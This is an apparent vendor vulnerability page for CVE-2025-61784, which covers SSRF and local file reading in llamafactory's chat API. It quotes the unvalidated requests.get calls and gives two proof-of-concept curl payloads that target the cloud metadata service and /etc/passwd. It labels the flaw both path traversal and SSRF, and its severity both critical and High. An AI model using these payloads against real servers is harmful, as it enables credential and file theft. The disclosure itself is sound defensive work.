CVE-2025-61784

CVE-2025-61784 is a high-severity path traversal vulnerability in llamafactory (pip), affecting versions <= 0.9.3. It is fixed in 0.9.4.

Summary

A Server-Side Request Forgery (SSRF) vulnerability in the chat API allows any authenticated user to force the server to make arbitrary HTTP requests to internal and external networks. This can lead to the exposure of sensitive internal services, reconnaissance of the internal network, or interaction with third-party services. The same mechanism also allows for a Local File Inclusion (LFI) vulnerability, enabling users to read arbitrary files from the server's filesystem.

Details

The vulnerability exists in the _process_request function within src/llamafactory/api/chat.py. This function is responsible for processing incoming multimodal content, including images, videos, and audio provided via URLs.

The function checks if the provided URL is a base64 data URI or a local file path (os.path.isfile). If neither is true, it falls back to treating the URL as a web URI and makes a direct HTTP GET request using requests.get(url, stream=True).raw without any validation or sanitization of the URL.

Vulnerable Code Snippets in _process_request:

# ...
        elif input_item.type == "image_url":
            # ...
            else:  # web uri
                image_stream = requests.get(image_url, stream=True).raw
# ...
        elif input_item.type == "video_url":
            # ...
            else:  # web uri
                video_stream = requests.get(video_url, stream=True).raw
# ...
        elif input_item.type == "audio_url":
            # ...
            else:  # web uri
                audio_stream = requests.get(audio_url, stream=True).raw
# ...

This vulnerable function is called by create_chat_completion_response and create_stream_chat_completion_response, which are in turn called by the public-facing /v1/chat/completions API endpoint in src/llamafactory/api/app.py. A user can craft a request to this endpoint containing a malicious URL in the messages payload to trigger the vulnerability.
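The missing check described above, sketched as an added example (this is not the project's 0.9.4 fix and not code from the advisory; validate_media_url, UnsafeMediaURL and the injectable resolve parameter are hypothetical names). It assumes base64 data URIs are decoded inline before this point, and it refuses bare filesystem paths instead of opening them.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


class UnsafeMediaURL(ValueError):
    """The URL must not be fetched (or opened) by the API server."""


def _resolve(host, port):
    # Every address the name maps to, A and AAAA records alike.
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return [info[4][0] for info in infos]


def validate_media_url(url, resolve=_resolve):
    """Return (host, port, ip_to_connect_to) for a public web URL, else raise."""
    parts = urlsplit(url)
    # "/etc/passwd" has no scheme; file:, data:, gopher: and so on are refused too.
    if parts.scheme not in ("http", "https"):
        raise UnsafeMediaURL(f"scheme {parts.scheme!r} is not fetchable")
    if not parts.hostname or parts.username or parts.password:
        raise UnsafeMediaURL("missing host or embedded credentials")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        addrs = resolve(parts.hostname, port)
    except OSError as exc:
        raise UnsafeMediaURL(f"cannot resolve {parts.hostname}") from exc
    if not addrs:
        raise UnsafeMediaURL(f"cannot resolve {parts.hostname}")
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%")[0])  # drop any IPv6 zone id
        # Unwrap IPv4-mapped IPv6 such as ::ffff:169.254.169.254 before judging.
        ip = getattr(ip, "ipv4_mapped", None) or ip
        # One bad record fails the URL: loopback, RFC 1918, link-local, metadata.
        if not ip.is_global:
            raise UnsafeMediaURL(f"{parts.hostname} resolves to non-public {ip}")
    # Connect to this address, not the name, so a second lookup cannot differ.
    return parts.hostname, port, addrs[0]
```

Fetch with allow_redirects=False and run every redirect target through the same check; otherwise a public host can still send the server to an internal address.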

PoC

To reproduce the vulnerability, send a POST request to the /v1/chat/completions endpoint with a JSON payload containing a URL that points to an internal or controlled external service.

  1. Start the LLaMA Factory API server.
  2. Use curl to send the malicious request. The following example uses a URL pointing to the AWS metadata service, a common SSRF attack vector.

SSRF Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "http://169.254.169.254/latest/meta-data/"
          }
        }
      ]
    }
  ]
}'

LFI Payload:

curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_api_key" \
-d '{
  "model": "your-model-name",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "What is in this image?"
        },
        {
          "type": "image_url",
          "image_url": {
            "url": "/etc/passwd"
          }
        }
      ]
    }
  ]
}'

The server will make a request to the specified URL or read the specified local file.

Impact

Vulnerability Type: Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI).

Impacted Component: The API server, specifically the /v1/chat/completions endpoint.

Who is impacted: Any user who can send requests to the chat API. The vulnerability allows an attacker to bypass firewalls and access internal network resources, query cloud metadata services for credentials, or read sensitive files on the server. The severity is critical.

Credits

Wenhao Wu, ChengGao, Alibaba Cloud Intelligence Security Team

Impact

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2025-61784 has a CVSS score of 7.6 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.9.4); upgrading removes the vulnerable code path.

Affected versions

llamafactory (<= 0.9.3)

Security releases

llamafactory → 0.9.4 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Remediation advice

Upgrade llamafactory to 0.9.4 or later to resolve this vulnerability.

Frequently Asked Questions

  1. What is CVE-2025-61784? CVE-2025-61784 is a high-severity path traversal vulnerability in llamafactory (pip), affecting versions <= 0.9.3. It is fixed in 0.9.4. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2025-61784? CVE-2025-61784 has a CVSS score of 7.6 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of llamafactory are affected by CVE-2025-61784? llamafactory (pip) versions <= 0.9.3 are affected.
  4. Is there a fix for CVE-2025-61784? Yes. CVE-2025-61784 is fixed in 0.9.4. Upgrade to this version or later.
  5. Is CVE-2025-61784 exploitable, and should I be worried? Whether CVE-2025-61784 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  6. What actually determines whether CVE-2025-61784 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2025-61784? Upgrade llamafactory to 0.9.4 or later.

Other vulnerabilities in llamafactory

CVE-2025-61784, CVE-2025-53002, CVE-2024-52803
